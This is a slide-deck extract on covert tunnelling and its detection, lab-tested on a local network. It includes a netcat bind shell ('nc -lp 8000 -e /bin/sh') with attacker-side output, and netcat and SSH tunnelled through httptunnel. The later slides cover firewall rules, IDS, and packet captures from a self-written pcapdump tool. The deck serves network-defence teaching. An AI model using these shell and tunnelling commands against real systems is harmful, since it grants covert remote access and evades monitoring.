8/13/2019 Ccue Janicki Richard

1/30

COVERT TUNNELING

Uses and Detection

Rich Janicki

8/13/2019 Ccue Janicki Richard

2/30

WHAT IS COVERT TUNNELING?

Today covert tunnels are defined as those that

use entities not normally viewed as data objects,but that can be manipulated maliciously totransfer information from one subject toanother[2].

Some protocols that can be used are HTTP,ICMP, DNS, and SSH to name a few

Steganography can be used to conceal data in

image files such as jpeg

8/13/2019 Ccue Janicki Richard

3/30

WHY IS COVERT TUNNELING IMPORTANT?

As a Network Administrator, one could use

covert tunneling for good It can provide a safe way to maintenance servers It can hide sensitive data from prying eyes

Allows one to test their network equipmentdesigned to prevent the usage of these techniques Hackers can use tunneling to hide their tracks Malware can use tunneling to receive updates

and commands, as well as hide activities

8/13/2019 Ccue Janicki Richard

4/30

HACKERS USE COVERT TUNNELING?

As stated earlier malware programs can use

tunneling to send and receive commands Botnets thrive on the ability to use tunneling The combinations of these techniques allow the

botnet operator to remain hidden whilecontrolling many computers

Trojan/Backdoors use common tools, orvariations of these tools, to allow remote access to

a compromised system Knowing how these tools operate is key to

defending against them

8/13/2019 Ccue Janicki Richard

5/30

DEMONSTRATION OF COVERT TUNNELING

8/13/2019 Ccue Janicki Richard

6/30

NETCAT

The Swiss Army Knife of TCP/IP

Many uses including backdoors, port scanning,port listening, simple file sharing, and simplechat

Integrates well with Covert Tunneling Implements easily into programs and scripting

8/13/2019 Ccue Janicki Richard

7/30

NETCAT ON TARGET

****Netcat*****

root@bt:~# nc -lp 8000 hello hi

this is a basic netcat conversation ok goodbye

see you later

8/13/2019 Ccue Janicki Richard

8/30

NETCAT ON ATTACKER

****Netcat Chat****

rich@netbookremix:~$ nc 192.168.1.121 8000 hello hi

this is a basic netcat conversation ok goodbye

see you later ^C

8/13/2019 Ccue Janicki Richard

9/30

NETCAT SHELL ON TARGET

****Netcat Shell****

root@bt:~# nc -lp 8000 -e /bin/sh

8/13/2019 Ccue Janicki Richard

10/30

NETCAT SHELL ON ATTACKER ****Netcat Shell****

rich@netbookremix:~$ nc 192.168.1.121 8000

whoami

root ifconfig

eth0 Link encap:Ethernet HWaddr 00:0c:76:32:56:61

inet addr:192.168.1.121 Bcast:192.168.1.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:27 errors:0 dropped:0 overruns:0 frame:0

TX packets:21 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000

RX bytes:2452 (2.4 KB) TX bytes:1855 (1.8 KB)

Interrupt:23 Base address:0xcc00

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

8/13/2019 Ccue Janicki Richard

11/30

HTTPTUNNEL

****Netcat over Httptunnel (Target)****

root@bt:~# hts -F localhost:8000 80 root@bt:~# nc -lp 8000

****Netcat over Httptunnel (Attacker)**** rich@netbookremix:~$ htc -F 10001

192.168.1.121:80 rich@netbookremix:~$ nc 127.0.0.1 10001

8/13/2019 Ccue Janicki Richard

12/30

SSH

****Normal SSH****

rich@netbookremix:~$ ssh root@192.168.1.121 root@192.168.1.121's password:

BackTrack 4 (PwnSauce) Penetration Testingand Auditing Distribution

Last login: Thu Mar 18 21:57:43 2010 root@bt:~# whoami root

8/13/2019 Ccue Janicki Richard

13/30

SSH OVER HTTPTUNNEL ****SSH over Httptunnel (Target)**** root@bt:~# hts -F localhost:22 8081

****SSH over Httptunnel (Attacker)**** rich@netbookremix:~$ htc -F 10003 192.168.1.121:8081 rich@netbookremix:~$ ssh root@127.0.0.1 -p 10003 The authenticity of host '[127.0.0.1]:10003 ([127.0.0.1]:10003)' can't be

established.

RSA key fingerprint is 62:fb:a9:b3:67:f0:6d:c8:58:f1:1a:01:2c:21:89:73. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[127.0.0.1]:10003' (RSA) to the list of

known hosts. root@127.0.0.1's password:

BackTrack 4 (PwnSauce) Penetration Testing and AuditingDistribution Last login: Thu Mar 18 22:06:26 2010 from 192.168.1.115 root@bt:~# whoami root

8/13/2019 Ccue Janicki Richard

14/30

CRYPTCAT

****Cryptcat****

root@bt:~# cryptcat -lp 9000 hello hi

this conversation is a basic cryptcat conversation that means its encrypted right? yes sir

goodbye see you later

8/13/2019 Ccue Janicki Richard

15/30

8/13/2019 Ccue Janicki Richard

16/30

TOOLS TO DEFEND AGAINST COVERTTUNNELING

Web Tap commercial product

Open Source firewalls such as IPCop orSmoothwall Wireshark, Network Miner, or NetWitness

Snort Intrusion Detection System (IDS)

8/13/2019 Ccue Janicki Richard

17/30

FIREWALL RULES

Prevent unwanted traffic Close and stop unnecessary ports and services

Prevent ACK tunneling by examining the way aconnection is initialized Set connection timeouts Enable content filtering Use Intrusion Detection Systems Use Proxies with Authentication Don't allow HTTP-CONNECT queries Use Anti-virus and anti-malware programs Inspect log files regularly, monitor traffic, a build

statistics of both [10]

8/13/2019 Ccue Janicki Richard

18/30

8/13/2019 Ccue Janicki Richard

19/30

WIRESHARK

8/13/2019 Ccue Janicki Richard

20/30

WIRESHARK

8/13/2019 Ccue Janicki Richard

21/30

WIRESHARK

8/13/2019 Ccue Janicki Richard

22/30

PCAPDUMP.RB

Programmed in Ruby

Uses Ruby pcap, and pcaplet libraries Command line tool to ease in viewing pcap files To be used on already captured pcap files

User can see plain text information being sentover the network faster Tool I created to learn more about pcap files and

to help understand network protocols rich@netbookremix:~/presentation$ ruby

pcapdump.rb -r alltestshub.pcap

8/13/2019 Ccue Janicki Richard

23/30

PCAPDUMP.RB ****************pcapdump by Rich Janicki********************

23:01:30.842629 192.168.1.115:34828 > 192.168.1.121:8000 .AP...

DATA---> hello ---------------------------------------------------------------

23:01:37.310009 192.168.1.121:8000 > 192.168.1.115:34828 .AP...

DATA---> hi

---------------------------------------------------------------

23:01:48.922890 192.168.1.115:34828 > 192.168.1.121:8000 .AP...

DATA---> this is a basic netcat conversation

---------------------------------------------------------------

23:01:55.845469 192.168.1.121:8000 > 192.168.1.115:34828 .AP...

DATA---> ok

---------------------------------------------------------------

23:01:59.603798 192.168.1.115:34828 > 192.168.1.121:8000 .AP...

DATA---> goodbye

---------------------------------------------------------------

23:02:06.518693 192.168.1.121:8000 > 192.168.1.115:34828 .AP...

DATA---> see you later

8/13/2019 Ccue Janicki Richard

24/30

PCAPDUMP.RB --------------------------------------------------------------- 23:02:49.115744 192.168.1.115:34829 > 192.168.1.121:8000 .AP...

DATA---> ifconfig --------------------------------------------------------------- 23:02:49.117790 192.168.1.121:8000 > 192.168.1.115:34829 .AP...

DATA---> eth0 Link encap:Ethernet HWaddr 00:0c:76:32:56:61 inet addr:192.168.1.121 Bcast:192.168.1.255

Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500

Metric:1

RX packets:27 errors:0 dropped:0 overruns:0 frame:0 TX packets:21 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2452 (2.4 KB) TX bytes:1855 (1.8 KB) Interrupt:23 Base address:0xcc00

8/13/2019 Ccue Janicki Richard

25/30

PCAPDUMP CATCHING HTTPTUNNEL *--------------------------------------------------------------- 23:04:33.718566 192.168.1.115:56256 > 192.168.1.121:80 .AP...

DATA---> GET /index.html?crap=1268967869 HTTP/1.1 --------------------------------------------------------------- 23:04:33.719179 192.168.1.115:56256 > 192.168.1.121:80 .AP...

DATA---> Host: 192.168.1.121:80 Connection: close

--------------------------------------------------------------- 23:04:33.719428 192.168.1.121:80 > 192.168.1.115:56256 .AP...

DATA---> HTTP/1.1 200 OK

Content-Length: 102400 Connection: close Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 Content-Type: text/html

8/13/2019 Ccue Janicki Richard

26/30

PCAPDUMP CATCHING HTTPTUNNEL --------------------------------------------------------------- 23:04:35.657512 192.168.1.115:56255 > 192.168.1.121:80

.AP...

DATA---> --------------------------------------------------------------- 23:04:35.657515 192.168.1.115:56255 > 192.168.1.121:80

.AP...

DATA---> hello --------------------------------------------------------------- 23:04:38.660736 192.168.1.121:80 > 192.168.1.115:56256

.AP...

DATA---> E--------------------------------------------------------------- Content-Type: text/html

8/13/2019 Ccue Janicki Richard

27/30

CATCHING SSH F--------------------------------------------------------------- 23:06:28.404301 192.168.1.121:22 > 192.168.1.115:54506 .AP...

DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1 --------------------------------------------------------------- 23:06:28.410369 192.168.1.115:54506 > 192.168.1.121:22 .AP...

DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2 --------------------------------------------------------------- 23:06:28.410858 192.168.1.115:54506 > 192.168.1.121:22 .AP...

DATA---> ^wx?0JJf{~diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1ssh-rsa,ssh-dssaes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctraes128-cbc,3des-cbc,blowfish-cbc,cast128-

cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctrihmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96ihmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96none,zlib@openssh.com,zlibnone,zlib@openssh.com,zlib---------------------------------------------------------------

8/13/2019 Ccue Janicki Richard

28/30

EXAMPLE SSH PACKET 23:06:28.411906 192.168.1.115:54506 > 192.168.1.121:22 .AP...

DATA---> " --------------------------------------------------------------- 23:06:28.423842 192.168.1.121:22 > 192.168.1.115:54506 .AP...

DATA---> IiL7+ec~x^+

'+"d{ w3-

SX]vj6&Fb?J`[G&Q

sUceL

Be rA('\ ---------------------------------------------------------------

8/13/2019 Ccue Janicki Richard

29/30

EXAMPLE CRYPTCAT PACKET F--------------------------------------------------------------- 23:12:36.584469 192.168.1.115:57305 > 192.168.1.121:9000 .AP...

DATA---> QJmQk,N---------------------------------------------------------------

23:12:36.584479 192.168.1.115:57305 > 192.168.1.121:9000 .AP...

DATA---> 192.168.1.115:57305 .AP...

DATA--->

>9M--------------------------------------------------------------- 23:12:43.066825 192.168.1.121:9000 > 192.168.1.115:57305 .AP...

DATA---> 3f_8=M---------------------------------------------------------------

8/13/2019 Ccue Janicki Richard

30/30

CONCLUSION

Some things to think about

These tests were performed on a local network They can be expanded to simulate an attack on a

large network Pcap files can get very large, very quickly Dont run Wireshark for extended periods of time All of the tests were captured in about 15

minutes using one pcap file Using pcapdump to save the output to a text file

(in this case) creates a fairly large file